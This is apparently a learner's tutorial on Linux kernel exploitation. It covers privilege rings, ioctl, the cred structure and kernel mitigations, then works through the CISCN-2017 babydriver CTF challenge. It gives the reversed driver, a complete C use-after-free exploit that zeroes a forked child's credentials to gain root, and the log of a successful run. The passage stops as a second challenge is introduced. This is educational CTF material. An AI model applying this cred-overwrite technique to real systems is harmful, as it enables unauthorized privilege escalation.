My first look at kernel exploitation.

Most of this follows the material from CTF-Wiki and M4x.

Basic Knowledge

What is kernel?

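The kernel is a program that manages the I/O requests issued by software, translates them into instructions, and hands them to the CPU and the other components of the machine. It covers I/O, access control, system calls, process management, memory management and more, but its two main jobs are:

Controlling and interacting with the hardware;
Providing an environment in which applications can run.

A crash in an application only terminates that program, while a crash in the kernel usually takes down the whole system (a panic, typically followed by a reboot).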

Ring Model

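Intel CPUs divide privilege into four levels: Ring 0, Ring 1, Ring 2 and Ring 3. Ring 0 is reserved for the OS, Ring 3 is available to every program, and an inner ring can freely use the resources of an outer ring. The ring model exists to improve system security.

Most modern operating systems only use Ring 0 and Ring 3.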
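
On x86 the current privilege level is stored in the low two bits of the CS selector, which makes the ring model easy to see in numbers. The snippet below is only a sketch: the helper name cpl_from_cs is made up for illustration, and 0x33 and 0x10 are the code selectors x86-64 Linux normally uses for user and kernel mode.

```c
#include <stdint.h>

/* Hypothetical helper: bits 0-1 of a segment selector such as CS hold
 * the privilege level (0 = Ring 0, 3 = Ring 3). */
static inline unsigned cpl_from_cs(uint16_t cs)
{
    return cs & 0x3;
}
```

With those selectors, cpl_from_cs(0x33) gives 3 and cpl_from_cs(0x10) gives 0.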

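Loadable Kernel Modules (LKMs)

Loadable kernel modules are like executables that run in kernel space. They include:

Drivers (Device Drivers)
- Device drivers
- Filesystem drivers
- …
Kernel extension modules (modules)

LKMs use the same file format as user-space executables (ELF), so tools such as IDA can be used to analyze them.

Linux provides the module mechanism because it is a monolithic kernel. A monolithic kernel is efficient because everything lives together, but it is comparatively hard to extend and maintain, and modules exist to make up for that.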

syscall

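A system call is how a user-space program asks the operating system kernel for a service that needs higher privilege, such as I/O or inter-process communication. System calls are the interface between user programs and the operating system, and some library functions are just wrappers around them.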
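
To make the "library functions are wrappers" point concrete, here is a minimal sketch that issues getpid through the generic syscall() entry point instead of the dedicated libc function. The helper name raw_getpid is my own; syscall() and SYS_getpid come from glibc on Linux.

```c
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

/* Invoke the getpid system call by number through the generic
 * syscall() wrapper rather than through getpid(). */
static pid_t raw_getpid(void)
{
    return (pid_t)syscall(SYS_getpid);
}
```

Both paths end up in the same kernel handler, so raw_getpid() and getpid() return the same value.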

`ioctl`

ioctl is a system call used to communicate with devices:

IOCTL(2)                    BSD System Calls Manual                   IOCTL(2)

NAME
     ioctl -- control device

SYNOPSIS
     #include <sys/ioctl.h>

     int
     ioctl(int fildes, unsigned long request, ...);

DESCRIPTION
     The ioctl() function manipulates the underlying device parameters of special files.  In particular, many operat-
     ing characteristics of character special files (e.g. terminals) may be controlled with ioctl() requests.  The
     argument fildes must be an open file descriptor.

     An  ioctl request has encoded in it whether the argument is an ``in'' parameter or ``out'' parameter, and the
     size of the argument argp in bytes.  Macros and defines used in specifying an ioctl request are located in the
     file <sys/ioctl.h>.

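The first argument, fildes, is the file descriptor returned by opening the device;
The second argument, request, is the control command the user program sends to the device;
Any further arguments are extra, device-specific parameters.

Why the kernel uses ioctl for this communication:

The operating system provides system calls through which the kernel accesses standard external devices, since most hardware can only be addressed directly from kernel space. Those system calls are a poor fit for non-standard hardware, though, and user mode sometimes needs to reach a device directly;
To solve this, the kernel is designed to be extensible: a module called a device driver can be added, whose code runs in kernel space and can address the device directly. The ioctl interface is a single system call through which user space talks to device drivers. A request to a driver is an ioctl call that takes the device and a request number as arguments, so the kernel lets user space reach the driver, and through it the device, without knowing the device's details and without a pile of device-specific system calls.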
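
A small runnable illustration of the three-argument shape, using a standard request instead of a custom driver: FIONREAD asks how many bytes are waiting on a descriptor and returns the answer through the third argument. The helper name pending_bytes is made up for this sketch.

```c
#include <sys/ioctl.h>
#include <unistd.h>

/* Ask the kernel how many bytes are ready to be read on fd.
 * FIONREAD is the request number; &n is the request-specific
 * "out" parameter. Returns -1 if the ioctl fails. */
static int pending_bytes(int fd)
{
    int n = 0;
    if (ioctl(fd, FIONREAD, &n) < 0)
        return -1;
    return n;
}
```

A driver-specific request such as the 0x10001 command seen later works the same way, only the meaning of the request number and the extra argument is defined by the driver.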

Status Switching

User Space to Kernel Space

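A switch from user mode to kernel mode happens on a system call, an exception, or an interrupt from a peripheral. For a system call the steps are:

Switch GS with the SWAPGS instruction, which exchanges the current GS value with a value kept at a fixed location. This saves the user GS value and installs the one the kernel uses while it runs;
Record the current (user-space) stack top in a per-CPU variable and load the kernel stack top recorded in the per-CPU area into RSP/ESP;
Save the registers with PUSH instructions;
Check whether the call uses the x32 ABI;
Jump through the global sys_call_table to the entry selected by the system call number and carry on executing the system call.

Saving the user-mode registers: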

ENTRY(entry_SYSCALL_64)
    /*
     * Interrupts are off on entry.
     * We do not frame this tiny irq-off block with TRACE_IRQS_OFF/ON,
     * it is too small to ever cause noticeable irq latency.
     */
    SWAPGS_UNSAFE_STACK
    /*
     * A hypervisor implementation might want to use a label
     * after the swapgs, so that it can do the swapgs
     * for the guest and jump here on syscall.
     */
GLOBAL(entry_SYSCALL_64_after_swapgs)

    movq    %rsp, PER_CPU_VAR(rsp_scratch)
    movq    PER_CPU_VAR(cpu_current_top_of_stack), %rsp

    TRACE_IRQS_OFF

    /* Construct struct pt_regs on stack */
    pushq    $__USER_DS            /* pt_regs->ss */
    pushq    PER_CPU_VAR(rsp_scratch)    /* pt_regs->sp */
    pushq    %r11                /* pt_regs->flags */
    pushq    $__USER_CS            /* pt_regs->cs */
    pushq    %rcx                /* pt_regs->ip */
    pushq    %rax                /* pt_regs->orig_ax */
    pushq    %rdi                /* pt_regs->di */
    pushq    %rsi                /* pt_regs->si */
    pushq    %rdx                /* pt_regs->dx */
    pushq    %rcx                /* pt_regs->cx */
    pushq    $-ENOSYS            /* pt_regs->ax */
    pushq    %r8                /* pt_regs->r8 */
    pushq    %r9                /* pt_regs->r9 */
    pushq    %r10                /* pt_regs->r10 */
    pushq    %r11                /* pt_regs->r11 */
    sub    $(6*8), %rsp            /* pt_regs->bp, bx, r12-15 not saved */

Kernel Space to User Space

The steps for leaving kernel mode are:

Restore the GS value with SWAPGS;
Return to the user context with sysretq or iretq. With iretq, some user-space state must also be supplied (CS, EFLAGS/RFLAGS, ESP/RSP and so on).
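
In 64-bit mode iretq pops five 8-byte values in a fixed order: RIP, CS, RFLAGS, RSP, SS. The sketch below writes that layout down as a struct; the names iret_frame and push_iret_frame are hypothetical helpers, not kernel definitions.

```c
#include <stddef.h>
#include <stdint.h>

/* Stack layout consumed by iretq in 64-bit mode, lowest address first. */
struct iret_frame {
    uint64_t rip;
    uint64_t cs;
    uint64_t rflags;
    uint64_t rsp;
    uint64_t ss;
};

/* Hypothetical helper: append the frame to an array of 64-bit slots,
 * starting at index i, and return the next free index. */
static size_t push_iret_frame(uint64_t *chain, size_t i,
                              const struct iret_frame *f)
{
    chain[i++] = f->rip;
    chain[i++] = f->cs;
    chain[i++] = f->rflags;
    chain[i++] = f->rsp;
    chain[i++] = f->ss;
    return i;
}
```

This is why an exploit that returns with iretq has to save the user-mode cs, ss, rsp and rflags before it enters the kernel.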

Process Structure

The kernel records a process's privileges (uid, gid and so on) in a cred structure. If you can modify a process's cred, you have changed that process's privileges.

/*
 * The security context of a task
 *
 * The parts of the context break down into two categories:
 *
 *  (1) The objective context of a task.  These parts are used when some other
 *    task is attempting to affect this one.
 *
 *  (2) The subjective context.  These details are used when the task is acting
 *    upon another object, be that a file, a task, a key or whatever.
 *
 * Note that some members of this structure belong to both categories - the
 * LSM security pointer for instance.
 *
 * A task has two security pointers.  task->real_cred points to the objective
 * context that defines that task's actual details.  The objective part of this
 * context is used whenever that task is acted upon.
 *
 * task->cred points to the subjective context that defines the details of how
 * that task is going to act upon another object.  This may be overridden
 * temporarily to point to another security context, but normally points to the
 * same context as task->real_cred.
 */
struct cred {
    atomic_t    usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
    atomic_t    subscribers;    /* number of processes subscribed */
    void        *put_addr;
    unsigned    magic;
#define CRED_MAGIC    0x43736564
#define CRED_MAGIC_DEAD    0x44656144
#endif
    kuid_t        uid;        /* real UID of the task */
    kgid_t        gid;        /* real GID of the task */
    kuid_t        suid;        /* saved UID of the task */
    kgid_t        sgid;        /* saved GID of the task */
    kuid_t        euid;        /* effective UID of the task */
    kgid_t        egid;        /* effective GID of the task */
    kuid_t        fsuid;        /* UID for VFS ops */
    kgid_t        fsgid;        /* GID for VFS ops */
    unsigned    securebits;    /* SUID-less security management */
    kernel_cap_t    cap_inheritable; /* caps our children can inherit */
    kernel_cap_t    cap_permitted;    /* caps we're permitted */
    kernel_cap_t    cap_effective;    /* caps we can actually use */
    kernel_cap_t    cap_bset;    /* capability bounding set */
    kernel_cap_t    cap_ambient;    /* Ambient capability set */
#ifdef CONFIG_KEYS
    unsigned char    jit_keyring;    /* default keyring to attach requested
                     * keys to */
    struct key __rcu *session_keyring; /* keyring inherited over fork */
    struct key    *process_keyring; /* keyring private to this process */
    struct key    *thread_keyring; /* keyring private to this thread */
    struct key    *request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
    void        *security;    /* subjective LSM security */
#endif
    struct user_struct *user;    /* real user ID subscription */
    struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
    struct group_info *group_info;    /* supplementary groups for euid/fsgid */
    struct rcu_head    rcu;        /* RCU deletion hook */
};
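
To see where the ID fields sit, here is a userland mirror of the start of the structure. It is a sketch under stated assumptions, not the kernel's definition: CONFIG_DEBUG_CREDENTIALS is taken to be off, and atomic_t, kuid_t and kgid_t are each taken to be 4 bytes wide. The name cred_prefix and the two constants are my own.

```c
#include <stddef.h>
#include <stdint.h>

/* Assumed layout of the first fields of struct cred when
 * CONFIG_DEBUG_CREDENTIALS is disabled. */
struct cred_prefix {
    int32_t  usage;
    uint32_t uid, gid, suid, sgid, euid, egid, fsuid, fsgid;
};

enum {
    CRED_UID_OFFSET   = offsetof(struct cred_prefix, uid),   /* 4  */
    CRED_FSUID_OFFSET = offsetof(struct cred_prefix, fsuid)  /* 28 */
};
```

Under those assumptions the first 28 bytes cover usage plus uid, gid, suid, sgid, euid and egid, so zeroing them is enough to make all six IDs 0.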

Functions in Kernel

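Kernel functions and their user-space counterparts:

printf() -> printk()
- printk() output does not necessarily show up on the terminal, but it always lands in the kernel log buffer and can be read with dmesg
memcpy() -> copy_from_user()/copy_to_user()
- copy_from_user(): copies data from user space into kernel space
- copy_to_user(): copies data from kernel space into user space
malloc() -> kmalloc()
- the kernel's memory allocation function; similar to malloc(), but backed by the slab/slub allocator
free() -> kfree(), the counterpart of kmalloc()

The kernel also has two functions that can change privileges, int commit_creds(struct cred *new) and struct cred *prepare_kernel_cred(struct task_struct *daemon):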

/**
 * commit_creds - Install new credentials upon the current task
 * @new: The credentials to be assigned
 *
 * Install a new set of credentials to the current task, using RCU to replace
 * the old set.  Both the objective and the subjective credentials pointers are
 * updated.  This function may not be called if the subjective credentials are
 * in an overridden state.
 *
 * This function eats the caller's reference to the new credentials.
 *
 * Always returns 0 thus allowing this function to be tail-called at the end
 * of, say, sys_setgid().
 */
int commit_creds(struct cred *new)
{
    struct task_struct *task = current;
    const struct cred *old = task->real_cred;

    kdebug("commit_creds(%p{%d,%d})", new,
           atomic_read(&new->usage),
           read_cred_subscribers(new));

    BUG_ON(task->cred != old);
#ifdef CONFIG_DEBUG_CREDENTIALS
    BUG_ON(read_cred_subscribers(old) < 2);
    validate_creds(old);
    validate_creds(new);
#endif
    BUG_ON(atomic_read(&new->usage) < 1);

    get_cred(new); /* we will require a ref for the subj creds too */

    /* dumpability changes */
    if (!uid_eq(old->euid, new->euid) ||
        !gid_eq(old->egid, new->egid) ||
        !uid_eq(old->fsuid, new->fsuid) ||
        !gid_eq(old->fsgid, new->fsgid) ||
        !cred_cap_issubset(old, new)) {
        if (task->mm)
            set_dumpable(task->mm, suid_dumpable);
        task->pdeath_signal = 0;
        smp_wmb();
    }

    /* alter the thread keyring */
    if (!uid_eq(new->fsuid, old->fsuid))
        key_fsuid_changed(task);
    if (!gid_eq(new->fsgid, old->fsgid))
        key_fsgid_changed(task);

    /* do it
     * RLIMIT_NPROC limits on user->processes have already been checked
     * in set_user().
     */
    alter_cred_subscribers(new, 2);
    if (new->user != old->user)
        atomic_inc(&new->user->processes);
    rcu_assign_pointer(task->real_cred, new);
    rcu_assign_pointer(task->cred, new);
    if (new->user != old->user)
        atomic_dec(&old->user->processes);
    alter_cred_subscribers(old, -2);

    /* send notifications */
    if (!uid_eq(new->uid,   old->uid)  ||
        !uid_eq(new->euid,  old->euid) ||
        !uid_eq(new->suid,  old->suid) ||
        !uid_eq(new->fsuid, old->fsuid))
        proc_id_connector(task, PROC_EVENT_UID);

    if (!gid_eq(new->gid,   old->gid)  ||
        !gid_eq(new->egid,  old->egid) ||
        !gid_eq(new->sgid,  old->sgid) ||
        !gid_eq(new->fsgid, old->fsgid))
        proc_id_connector(task, PROC_EVENT_GID);

    /* release the old obj and subj refs both */
    put_cred(old);
    put_cred(old);
    return 0;
}

/**
 * prepare_kernel_cred - Prepare a set of credentials for a kernel service
 * @daemon: A userspace daemon to be used as a reference
 *
 * Prepare a set of credentials for a kernel service.  This can then be used to
 * override a task's own credentials so that work can be done on behalf of that
 * task that requires a different subjective context.
 *
 * @daemon is used to provide a base for the security record, but can be NULL.
 * If @daemon is supplied, then the security data will be derived from that;
 * otherwise they'll be set to 0 and no groups, full capabilities and no keys.
 *
 * The caller may change these controls afterwards if desired.
 *
 * Returns the new credentials or NULL if out of memory.
 *
 * Does not take, and does not return holding current->cred_replace_mutex.
 */
struct cred *prepare_kernel_cred(struct task_struct *daemon)
{
    const struct cred *old;
    struct cred *new;

    new = kmem_cache_alloc(cred_jar, GFP_KERNEL);
    if (!new)
        return NULL;

    kdebug("prepare_kernel_cred() alloc %p", new);

    if (daemon)
        old = get_task_cred(daemon);
    else
        old = get_cred(&init_cred);

    validate_creds(old);

    *new = *old;
    atomic_set(&new->usage, 1);
    set_cred_subscribers(new, 0);
    get_uid(new->user);
    get_user_ns(new->user_ns);
    get_group_info(new->group_info);

#ifdef CONFIG_KEYS
    new->session_keyring = NULL;
    new->process_keyring = NULL;
    new->thread_keyring = NULL;
    new->request_key_auth = NULL;
    new->jit_keyring = KEY_REQKEY_DEFL_THREAD_KEYRING;
#endif

#ifdef CONFIG_SECURITY
    new->security = NULL;
#endif
    if (security_prepare_creds(new, old, GFP_KERNEL) < 0)
        goto error;

    put_cred(old);
    validate_creds(new);
    return new;

error:
    put_cred(new);
    put_cred(old);
    return NULL;
}

Calling commit_creds(prepare_kernel_cred(0)); gives root privileges. The addresses of both functions can be looked up in /proc/kallsyms:

$ sudo cat /proc/kallsyms | grep -E "commit_creds|prepare_kernel_cred"
ffffffff810a24a0 T commit_creds
ffffffff810a2890 T prepare_kernel_cred
ffffffff81d7f6c0 R __ksymtab_commit_creds
ffffffff81d881d0 R __ksymtab_prepare_kernel_cred
ffffffff81d9f028 r __kcrctab_commit_creds
ffffffff81da35b0 r __kcrctab_prepare_kernel_cred
ffffffff81db01e7 r __kstrtab_prepare_kernel_cred
ffffffff81db022e r __kstrtab_commit_creds
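
Each kallsyms line is "address type name", so pulling an address out programmatically is a one-line sscanf. The sketch below uses made-up helper names (parse_kallsyms_line, lookup_symbol) and matches the name exactly, because a substring search would also hit entries such as __ksymtab_commit_creds.

```c
#include <stdio.h>
#include <string.h>

/* Parse one "address type name" line. name needs room for 128 bytes.
 * Returns 1 on success, 0 if the line does not match. */
static int parse_kallsyms_line(const char *line, unsigned long long *addr,
                               char *type, char *name)
{
    return sscanf(line, "%llx %c %127s", addr, type, name) == 3;
}

/* Scan an already opened kallsyms-style stream for an exact symbol
 * name. Returns its address, or 0 if it is not found. */
static unsigned long long lookup_symbol(FILE *fp, const char *wanted)
{
    char line[256], name[128], type;
    unsigned long long addr;

    while (fgets(line, sizeof line, fp))
        if (parse_kallsyms_line(line, &addr, &type, name) &&
            strcmp(name, wanted) == 0)
            return addr;
    return 0;
}
```

Note that an unprivileged read of /proc/kallsyms may show all addresses as zero, depending on kptr_restrict.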

Mitigation

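CANARY, DEP, PIE, RELRO and similar protections work the same way and serve the same purpose as in user space;
smep (Supervisor Mode Execution Protection): while the processor is in Ring 0, executing code in user-space pages triggers a page fault;
smap (Supervisor Mode Access Protection): similar to smep, but it applies to data accesses to user-space pages;
mmap_min_addr: controls the lowest address that mmap is allowed to map.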
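
SMEP and SMAP are switched on by bits in the CR4 control register: bit 20 for SMEP and bit 21 for SMAP. A minimal sketch for decoding a CR4 value (for example one read in a debugger) follows; the helper names are my own.

```c
#include <stdbool.h>
#include <stdint.h>

#define CR4_SMEP (1ULL << 20) /* Supervisor Mode Execution Protection */
#define CR4_SMAP (1ULL << 21) /* Supervisor Mode Access Protection */

static bool smep_enabled(uint64_t cr4) { return (cr4 & CR4_SMEP) != 0; }
static bool smap_enabled(uint64_t cr4) { return (cr4 & CR4_SMAP) != 0; }
```

For a sample value of 0x1006f0, SMEP is on and SMAP is off; clearing bit 20 leaves 0x6f0, which has SMEP disabled.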

Kernel UAF (CISCN-2017-babydriver)

The challenge ships three files: boot.sh, bzImage and rootfs.cpio. bzImage is the compressed kernel image, and boot.sh is the QEMU launch script:

$ tar -xvf babydriver.tar
x boot.sh
x bzImage
x rootfs.cpio
$ file bzImage
bzImage: Linux kernel x86 boot executable bzImage, version 4.4.72 (atum@ubuntu) #1 SMP Thu Jun 15 19:52:50 PDT 2017, RO-rootFS, swap_dev 0x6, Normal VGA
$ bat boot.sh
#!/bin/bash

qemu-system-x86_64 -initrd rootfs.cpio -kernel bzImage -append 'console=ttyS0 root=/dev/ram oops=panic panic=1' -enable-kvm -monitor /dev/null -m 64M --nographic  -smp cores=1,threads=1 -cpu kvm64,+smep

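Next comes the filesystem, rootfs.cpio. After decompressing it with gunzip and unpacking it, we can see that the kernel version is 4.4.72 and that the root directory holds an init script, which sets the permissions on flag and loads the babydriver module. In other words, only root can read the flag: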

$ file rootfs.cpio
rootfs.cpio: gzip compressed data, last modified: Tue Jul  4 08:39:15 2017, max compression, from Unix
$ mv rootfs.cpio rootfs.cpio.gz
$ gunzip ./rootfs.cpio.gz
$ file rootfs.cpio
rootfs.cpio: ASCII cpio archive (SVR4 with no CRC)
$ mkdir fs && cd fs
$ cpio -idmv < ../rootfs.cpio
.
etc
etc/init.d
etc/passwd
etc/group
bin
...
init
proc
lib
lib/modules
lib/modules/4.4.72
lib/modules/4.4.72/babydriver.ko
sys
usr
...
tmp
linuxrc
home
home/ctf
5556 blocks
$ bat init
#!/bin/sh

mount -t proc none /proc
mount -t sysfs none /sys
mount -t devtmpfs devtmpfs /dev
chown root:root flag
chmod 400 flag
exec 0</dev/console
exec 1>/dev/console
exec 2>/dev/console

insmod /lib/modules/4.4.72/babydriver.ko
chmod 777 /dev/babydev
echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n"
setsid cttyhack setuidgid 1000 sh

umount /proc
umount /sys
poweroff -d 0  -f

Next, check the protections on babydriver.ko. As with an ordinary ELF, only NX is enabled here:

$ file babydriver.ko
babydriver.ko: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), BuildID[sha1]=8ec63f63d3d3b4214950edacf9e65ad76e0e00e7, not stripped
$ checksec ./babydriver.ko
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x0)

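Now open it in IDA and see what functions it has. First, one structure worth knowing is cdev (every character device corresponds to one cdev variable):

struct cdev {
    struct kobject kobj; // every cdev is a kobject
    struct module *owner; // the module that implements the driver
    const struct file_operations *ops; // operations on this character device
    struct list_head list; // list head of the inodes of the device files that map to this cdev
    dev_t dev; // first device number
    unsigned int count; // number of device numbers in the range
};

First is the module entry point, babydriver_init, which mostly goes through the steps of registering the /dev/babydev device: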

int __cdecl babydriver_init()
{
  int v0; // edx
  __int64 v1; // rsi
  int v2; // ebx
  class *v3; // rax
  __int64 v4; // rax

  if ( (signed int)alloc_chrdev_region(&babydev_no, 0LL, 1LL, "babydev") >= 0 ) // dynamically allocate a device number
  {
    cdev_init(&cdev_0, &fops); // initialize the statically allocated cdev
    v1 = babydev_no;
    cdev_0.owner = &_this_module; // set the owner to this module
    v2 = cdev_add(&cdev_0, babydev_no, 1LL); // add the cdev to the system
    if ( v2 >= 0 )
    {
      v3 = (class *)_class_create(&_this_module, "babydev", &babydev_no); // create the babydev device class
      babydev_class = v3;
      if ( v3 )
      {
        v4 = device_create(v3, 0LL, babydev_no, 0LL, "babydev"); // create the device node
        v0 = 0;
        if ( v4 ) // created successfully
          return v0;
        printk(&unk_351, 0LL); // creating the device node failed
        class_destroy(babydev_class); // destroy the class
      }
      else // class creation failed
      {
        printk(&unk_33B, "babydev");
      }
      cdev_del(&cdev_0); // remove the cdev from the system
    }
    else // cdev_add failed
    {
      printk(&unk_327, v1);
    }
    unregister_chrdev_region(babydev_no, 1LL); // release the device number
    return v2;
  }
  printk(&unk_309, 0LL);
  return 1;
}

The module exit function then removes the device and releases the resources:

void __cdecl babydriver_exit()
{
  device_destroy(babydev_class, babydev_no);
  class_destroy(babydev_class);
  cdev_del(&cdev_0);
  unregister_chrdev_region(babydev_no, 1LL);
}

babyioctl shows that the module has a structure called babydev_struct. On command 0x10001 it first calls kfree on the current device_buf, then kmallocs a buffer of the requested size and sets device_buf_len:

// local variable allocation has failed, the output may be wrong!
__int64 __fastcall babyioctl(file *filp, unsigned int command, unsigned __int64 arg)
{
  size_t v3; // rdx
  size_t len; // rbx
  __int64 result; // rax

  _fentry__(filp, *(_QWORD *)&command, arg);
  len = v3;
  if ( command == 0x10001 )
  {
    kfree(babydev_struct.device_buf);
    babydev_struct.device_buf = (char *)_kmalloc(len, 0x24000C0LL);
    babydev_struct.device_buf_len = len;
    printk("alloc done\n", 0x24000C0LL);
    result = 0LL;
  }
  else
  {
    printk(&unk_2EB, v3);
    result = -22LL;
  }
  return result;
}

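babyopen handles opening the device: it allocates a 0x40-byte buffer and stores the pointer in the global babydev_struct: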

int __fastcall babyopen(inode *inode, file *filp)
{
  _fentry__(inode, filp);
  babydev_struct.device_buf = (char *)kmem_cache_alloc_trace(kmalloc_caches[6], 0x24000C0LL, 0x40LL);
  babydev_struct.device_buf_len = 0x40LL;
  printk("device open\n", 0x24000C0LL);
  return 0;
}

babyread calls copy_to_user to copy the requested number of bytes from babydev_struct.device_buf to user space:

ssize_t __fastcall babyread(file *filp, char *buffer, size_t length, loff_t *offset)
{
  size_t v4; // rdx
  ssize_t result; // rax
  ssize_t v6; // rbx

  _fentry__(filp, buffer);
  if ( !babydev_struct.device_buf )
    return -1LL;
  result = -2LL;
  if ( babydev_struct.device_buf_len <= v4 )
    return result;
  v6 = v4;
  copy_to_user(buffer);
  result = v6;
  return result;
}

babywrite calls copy_from_user to read data into babydev_struct.device_buf:

ssize_t __fastcall babywrite(file *filp, const char *buffer, size_t length, loff_t *offset)
{
  size_t v4; // rdx
  ssize_t result; // rax
  ssize_t v6; // rbx

  _fentry__(filp, buffer);
  if ( !babydev_struct.device_buf )
    return -1LL;
  result = -2LL;
  if ( babydev_struct.device_buf_len <= v4 )
    return result;
  v6 = v4;
  copy_from_user();
  result = v6;
  return result;
}

Finally, babyrelease frees the memory behind device_buf, without clearing the pointer:

int __fastcall babyrelease(inode *inode, file *filp)
{
  _fentry__(inode, filp);
  kfree(babydev_struct.device_buf);
  printk("device release\n", filp);
  return 0;
}

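The bug is that babydev_struct is a single global and babyopen does not check how many times the device has been opened, which gives a use-after-free. The exploitation goes as follows:

Open /dev/babydev twice. The second open overwrites the buffer pointer stored by the first, so both file descriptors share the same device_buf. Closing the first descriptor then frees that buffer while the second descriptor can still read and write it;
Create a new process. Its cred structure is allocated from the chunk that was just freed, so writing through the second descriptor modifies the new process's cred;
Before closing the first descriptor, use ioctl to reallocate the buffer with the size of the cred structure (shown below) so that the freed chunk fits a cred allocation. Then overwrite the uid and gid fields at their offsets with 0 to become root.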

struct cred {
    atomic_t    usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
    atomic_t    subscribers;    /* number of processes subscribed */
    void        *put_addr;
    unsigned    magic;
#define CRED_MAGIC    0x43736564
#define CRED_MAGIC_DEAD    0x44656144
#endif
    kuid_t        uid;        /* real UID of the task */
    kgid_t        gid;        /* real GID of the task */
    kuid_t        suid;        /* saved UID of the task */
    kgid_t        sgid;        /* saved GID of the task */
    kuid_t        euid;        /* effective UID of the task */
    kgid_t        egid;        /* effective GID of the task */
    kuid_t        fsuid;        /* UID for VFS ops */
    kgid_t        fsgid;        /* GID for VFS ops */
    unsigned    securebits;    /* SUID-less security management */
    kernel_cap_t    cap_inheritable; /* caps our children can inherit */
    kernel_cap_t    cap_permitted;    /* caps we're permitted */
    kernel_cap_t    cap_effective;    /* caps we can actually use */
    kernel_cap_t    cap_bset;    /* capability bounding set */
    kernel_cap_t    cap_ambient;    /* Ambient capability set */
#ifdef CONFIG_KEYS
    unsigned char    jit_keyring;    /* default keyring to attach requested
                     * keys to */
    struct key __rcu *session_keyring; /* keyring inherited over fork */
    struct key    *process_keyring; /* keyring private to this process */
    struct key    *thread_keyring; /* keyring private to this thread */
    struct key    *request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
    void        *security;    /* subjective LSM security */
#endif
    struct user_struct *user;    /* real user ID subscription */
    struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
    struct group_info *group_info;    /* supplementary groups for euid/fsgid */
    struct rcu_head    rcu;        /* RCU deletion hook */
};
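
The aliasing is easier to follow in a userland model. The sketch below is not the driver: it replaces the slab allocator with a toy pool of fixed-size slots and a LIFO free list (so the most recently freed slot is handed out next), skips the ioctl resize because every slot already has the same size, and treats offset 4 of a slot as the uid field. All names are invented for the illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define SLOT_SIZE 0xa8
#define NSLOTS    4

/* Toy stand-in for a slab cache with a LIFO free list. */
static uint8_t slots[NSLOTS][SLOT_SIZE];
static int free_list[NSLOTS] = {3, 2, 1, 0};
static int free_top = NSLOTS;

static void *toy_alloc(void)
{
    return free_top ? (void *)slots[free_list[--free_top]] : NULL;
}

static void toy_free(void *p)
{
    free_list[free_top++] = (int)(((uint8_t *)p - &slots[0][0]) / SLOT_SIZE);
}

/* Model of the driver's single global buffer pointer. */
static uint8_t *device_buf;

static void toy_open(void)    { device_buf = toy_alloc(); }
static void toy_release(void) { toy_free(device_buf); /* pointer left dangling */ }

/* Replays open, open, close(fd1), fork, write(fd2) and returns the
 * "uid" of the simulated child cred afterwards. */
static uint32_t simulate_uaf(void)
{
    toy_open();     /* fd1 */
    toy_open();     /* fd2 overwrites the global pointer */
    toy_release();  /* close(fd1) frees the buffer both descriptors share */

    uint8_t *child_cred = toy_alloc();  /* "fork": cred reuses the freed slot */
    uint32_t uid = 1000;
    memcpy(child_cred + 4, &uid, sizeof uid);

    memset(device_buf, 0, 28);          /* write(fd2, zeros, 28) via the stale pointer */

    memcpy(&uid, child_cred + 4, sizeof uid);
    return uid;
}
```

In this model simulate_uaf() returns 0: the write through the stale device_buf lands in the slot that now holds the child's credentials.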

Exploit:

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <sys/stat.h>

int main() {
    int fd1, fd2, pid;
    fd1 = open("/dev/babydev", O_RDWR);
    fd2 = open("/dev/babydev", O_RDWR);
    ioctl(fd1, 0x10001, 0xa8); // reallocate device_buf with the size of struct cred (0xa8)
    close(fd1); // free the buffer; fd2 still refers to it

    pid = fork(); // the child's cred should reuse the freed chunk
    if (pid < 0) {
        puts("[!] fork error...");
        exit(-1);
    } else if (pid == 0) { // child process
        uint8_t fake_cred[30];
        memset(fake_cred, 0, sizeof(fake_cred));
        write(fd2, fake_cred, 28); // zero usage plus uid, gid, suid, sgid, euid, egid
        if (getuid() == 0) {
            puts("[+] get root!");
            system("/bin/sh");
            exit(0);
        }
    } else {
        wait(NULL);
    }
    close(fd2);
    return 0;
}

The filesystem contains no libraries, so the exploit has to be statically linked to run. After that, repack the filesystem and run boot.sh:

$ make
cc -static    exp.c   -o exp
$ file ./exp
./exp: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=8af26f6763d0d44db98089ae847f6104a4054c93, not stripped
$ cd fs/ && find . | cpio -o --format=newc > ../rootfs.cpio
7349 blocks
$ cd .. && sudo ./boot.sh

lsmod shows the base address of the loaded module:

/ $ lsmod
babydriver 16384 0 - Live 0xffffffffc0000000 (OE)
/ $ id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
/ $ cat flag
cat: can't open 'flag': Permission denied
/ $ /tmp/exp
[   23.769095] device open
[   23.773231] device open
[   23.775415] alloc done
[   23.784434] device release
[+] get root!
/ # id
uid=0(root) gid=0(root) groups=1000(ctf)
/ # cat flag
flag{this_is_a_flag}
/ #

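P4nda and Anceity have both written up ROP-based solutions.

Kernel ROP (QWB-2018-core)

The challenge ships four files. vmlinux is the uncompressed kernel image that bzImage is built from (extract-vmlinux can recover it from bzImage). start.sh is the launch script, which shows that kaslr is enabled: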

$ tar -zxvf core_give.tar.gz
./give_to_player/
./give_to_player/bzImage
./give_to_player/vmlinux
./give_to_player/core.cpio
./give_to_player/start.sh
$ bat start.sh
qemu-system-x86_64 \
-m 64M \
-kernel ./bzImage \
-initrd  ./core.cpio \
-append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr" \
-s  \
-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
-nographic  \

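As before, take a look at what the filesystem contains. init again gives away a lot:

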